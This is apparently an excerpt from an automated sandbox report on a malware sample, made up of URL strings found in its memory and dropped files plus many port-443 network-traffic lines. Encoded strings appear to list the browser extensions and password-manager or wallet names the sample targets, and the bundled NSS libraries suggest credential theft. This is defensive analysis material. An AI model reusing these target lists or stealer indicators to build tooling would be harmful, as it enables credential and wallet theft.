                      Source: hwWxZRwpeL.exe, 00000000.00000003.2492924259.0000000021422000.00000004.00000020.00020000.00000000.sdmp, JKJKJJDBKEGIECAAECFHCFBGIJ.0.drString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
                      Source: 7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.drString found in binary or memory: https://tidal.com/
                      Source: 7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.drString found in binary or memory: https://twitter.com/
                      Source: 7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.drString found in binary or memory: https://web.telegram.org/
                      Source: 7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.drString found in binary or memory: https://word.new?from=EdgeM365Shoreline
                      Source: hwWxZRwpeL.exe, 00000000.00000002.2589210016.000000000080F000.00000004.00000020.00020000.00000000.sdmp, BKEHDGDGHCBGCAKFIIIE.0.drString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
                      Source: hwWxZRwpeL.exe, 00000000.00000002.2589210016.000000000080F000.00000004.00000020.00020000.00000000.sdmp, BKEHDGDGHCBGCAKFIIIE.0.drString found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
                      Source: 7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.drString found in binary or memory: https://www.deezer.com/
                      Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.drString found in binary or memory: https://www.digicert.com/CPS0
                      Source: hwWxZRwpeL.exe, 00000000.00000002.2589210016.000000000080F000.00000004.00000020.00020000.00000000.sdmp, CFCGIIEH.0.drString found in binary or memory: https://www.ecosia.org/newtab/
                      Source: chrome.exe, 00000002.00000003.2185983143.00002B4400BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2154158801.00002B4400BCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2133329244.00002B4400BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2150785587.00002B4400BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2128194296.00002B4400BCC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/search?q=
                      Source: chrome.exe, 00000002.00000003.2185983143.00002B4400BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2154158801.00002B4400BCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2133329244.00002B4400BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2150785587.00002B4400BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2128194296.00002B4400BCC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearch
                      Source: chrome.exe, 00000002.00000003.2185983143.00002B4400BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2154158801.00002B4400BCC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2133329244.00002B4400BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2150785587.00002B4400BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2128194296.00002B4400BCC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearchn=opensearch
                      Source: chrome.exe, 00000002.00000003.2127412761.00002B4400D1C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/
                      Source: content_new.js.9.dr, content.js.9.drString found in binary or memory: https://www.google.com/chrome
                      Source: chrome.exe, 00000002.00000003.2154791159.00002B440169C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2155177550.00002B44016A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2152926565.00002B44016A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/hats/index.htmlb
                      Source: hwWxZRwpeL.exe, 00000000.00000002.2589210016.000000000080F000.00000004.00000020.00020000.00000000.sdmp, Web Data.9.dr, AEBGIEGC.0.dr, CFCGIIEH.0.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                      Source: chrome.exe, 00000002.00000003.2154046798.00002B4401BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2153619388.00002B4401C84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2153973674.00002B4401BB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2153564567.00002B4401C7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2154111774.00002B4401CB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2153522625.00002B4401C74000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/imghp?hl=en&amp;tab=ri&amp;ogbl
                      Source: chrome.exe, 00000002.00000003.2153522625.00002B4401C74000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl/en/about/products?tab=rh
                      Source: chrome.exe, 00000002.00000003.2154791159.00002B440169C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2155177550.00002B44016A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2152926565.00002B44016A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search
                      Source: chrome.exe, 00000002.00000003.2133633558.00002B440120C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=$
                      Source: chrome.exe, 00000002.00000003.2154791159.00002B440169C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2155177550.00002B44016A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2152926565.00002B44016A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/aida2
                      Source: chrome.exe, 00000002.00000003.2161474234.00002B440194C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2161398742.00002B4401944000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2161263204.00002B440192C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2161440665.00002B4401948000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2161336411.00002B4401930000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2161233398.00002B4401928000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2161368621.00002B4401940000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager
                      Source: chrome.exe, 00000002.00000003.2154791159.00002B440169C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2155177550.00002B44016A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2152926565.00002B44016A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager2
                      Source: chrome.exe, 00000002.00000003.2154791159.00002B440169C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2155177550.00002B44016A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2152926565.00002B44016A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager23
                      Source: chrome.exe, 00000002.00000003.2133329244.00002B4400BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2128194296.00002B4400BCC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/reauth/v1beta/users/
                      Source: ECAFHDBGHJ.exe.0.drString found in binary or memory: https://www.gstatic.com/firebasejs/9.21.0/firebase-analytics.js
                      Source: ECAFHDBGHJ.exe.0.drString found in binary or memory: https://www.gstatic.com/firebasejs/9.21.0/firebase-app.js
                      Source: chromecache_485.4.drString found in binary or memory: https://www.gstatic.com/gb/html/afbp.html
                      Source: chromecache_485.4.drString found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_medium.css
                      Source: chromecache_485.4.drString found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_small.css
                      Source: chrome.exe, 00000002.00000003.2154111774.00002B4401CB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/images/icons/material/system/1x/broken_image_grey600_18dp.png
                      Source: chrome.exe, 00000002.00000003.2154046798.00002B4401BD4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2153713547.00002B4401C4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2153856383.00002B4401C18000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2153973674.00002B4401BB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2154111774.00002B4401CB0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/images/icons/material/system/2x/broken_image_grey600_18dp.png
                      Source: chrome.exe, 00000002.00000003.2153973674.00002B4401BB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2153564567.00002B4401C7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2154111774.00002B4401CB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2153522625.00002B4401C74000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/og/_/js/k=og.qtm.en_US.JsvYdB1VlTQ.2019.O/rt=j/m=q_dnp
                      Source: chrome.exe, 00000002.00000003.2153973674.00002B4401BB8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2153564567.00002B4401C7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2154111774.00002B4401CB0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2153522625.00002B4401C74000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/og/_/ss/k=og.qtm.GZmhE2vV14w.L.W.O/m=qmd
                      Source: 7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.drString found in binary or memory: https://www.iheart.com/podcast/
                      Source: 7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.drString found in binary or memory: https://www.instagram.com
                      Source: 7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.drString found in binary or memory: https://www.last.fm/
                      Source: 7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.drString found in binary or memory: https://www.messenger.com
                      Source: hwWxZRwpeL.exe, 00000000.00000002.2588602641.00000000004E6000.00000040.00000001.01000000.00000003.sdmp, hwWxZRwpeL.exe, 00000000.00000002.2588602641.0000000000514000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.mozilla.org/about/
                      Source: hwWxZRwpeL.exe, 00000000.00000003.2492924259.0000000021422000.00000004.00000020.00020000.00000000.sdmp, JKJKJJDBKEGIECAAECFHCFBGIJ.0.drString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
                      Source: hwWxZRwpeL.exe, 00000000.00000002.2588602641.0000000000514000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
                      Source: hwWxZRwpeL.exe, 00000000.00000003.2492924259.0000000021422000.00000004.00000020.00020000.00000000.sdmp, JKJKJJDBKEGIECAAECFHCFBGIJ.0.drString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
                      Source: hwWxZRwpeL.exe, 00000000.00000002.2588602641.00000000004E6000.00000040.00000001.01000000.00000003.sdmp, hwWxZRwpeL.exe, 00000000.00000002.2588602641.0000000000514000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
                      Source: hwWxZRwpeL.exe, 00000000.00000003.2492924259.0000000021422000.00000004.00000020.00020000.00000000.sdmp, JKJKJJDBKEGIECAAECFHCFBGIJ.0.drString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                      Source: hwWxZRwpeL.exe, 00000000.00000002.2588602641.0000000000514000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/ZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBM
                      Source: hwWxZRwpeL.exe, 00000000.00000002.2588602641.0000000000514000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/lvYnwxfDB8MHxMYXN0UGFzc3xoZG9raWVqbnBpbWFrZWRoYWpoZGxj
                      Source: hwWxZRwpeL.exe, 00000000.00000002.2588602641.00000000004E6000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/on:
                      Source: hwWxZRwpeL.exe, 00000000.00000003.2492924259.0000000021422000.00000004.00000020.00020000.00000000.sdmp, JKJKJJDBKEGIECAAECFHCFBGIJ.0.drString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                      Source: hwWxZRwpeL.exe, 00000000.00000003.2492924259.0000000021422000.00000004.00000020.00020000.00000000.sdmp, JKJKJJDBKEGIECAAECFHCFBGIJ.0.drString found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
                      Source: hwWxZRwpeL.exe, 00000000.00000002.2588602641.00000000004E6000.00000040.00000001.01000000.00000003.sdmp, hwWxZRwpeL.exe, 00000000.00000002.2588602641.0000000000514000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/
                      Source: hwWxZRwpeL.exe, 00000000.00000003.2492924259.0000000021422000.00000004.00000020.00020000.00000000.sdmp, JKJKJJDBKEGIECAAECFHCFBGIJ.0.drString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                      Source: hwWxZRwpeL.exe, 00000000.00000002.2588602641.00000000004E6000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/kZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGp
                      Source: hwWxZRwpeL.exe, 00000000.00000002.2588602641.00000000004E6000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/vRm9ybXxwbmxjY21vamNtZW9obHBnZ21mbmJiaWFwa21ibGlvYnwxfDB8MHx
                      Source: 7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.drString found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1
                      Source: 7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.drString found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1&game
                      Source: 7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.drString found in binary or memory: https://www.msn.com/widgets/fullpage/cgSideBar/widget?experiences=CasualGamesHub&sharedHeader=1&item
                      Source: 7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.drString found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1
                      Source: 7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.drString found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1&item=fl
                      Source: 7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.drString found in binary or memory: https://www.msn.com/widgets/fullpage/gaming/widget?experiences=CasualGamesHub&sharedHeader=1&playInS
                      Source: 7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.drString found in binary or memory: https://www.office.com
                      Source: 7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.drString found in binary or memory: https://www.officeplus.cn/?sid=shoreline&endpoint=OPPC&source=OPCNshoreline
                      Source: 7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.drString found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true
                      Source: 7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.drString found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true&auth=1
                      Source: 7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.drString found in binary or memory: https://www.onenote.com/stickynotes?isEdgeHub=true&auth=2
                      Source: 7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.drString found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true
                      Source: 7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.drString found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=1
                      Source: 7bc7b85e-b5d8-4a49-9003-de0b73c7087d.tmp.9.drString found in binary or memory: https://www.onenote.com/stickynotesstaging?isEdgeHub=true&auth=2
                      Source: chrome.exe, 00000002.00000003.2128194296.00002B4400BCC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
                      Source: chrome.exe, 00000002.00000003.2133329244.00002B4400BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2150785587.00002B4400BC8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000002.00000003.2128194296.00002B4400BCC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/?feature=ytca
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49986
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49985
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49984
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49983
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49982
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49898 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50131 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49978
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49977
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49976
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49975
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49974
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50085 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49973
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49972
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50039 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49971
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49970
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49967 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50074 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50107 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49943 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49969
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49968
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49967
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49966
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49965
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49964
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49963
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50120 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49962
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49961
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49960
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50015 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50040 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49966 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50130 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50096 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50108 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50073 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49933 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50028 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49959
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49958
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49957
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49956
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49955
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49954
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49953
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50062 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49952
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50119 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49951
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49950
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49944 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50051 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49955 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49949
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49948
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49947
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49945
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49944
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49943
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50061 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49945 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50017 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49968 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50049 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50026 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49899
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49898
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49897
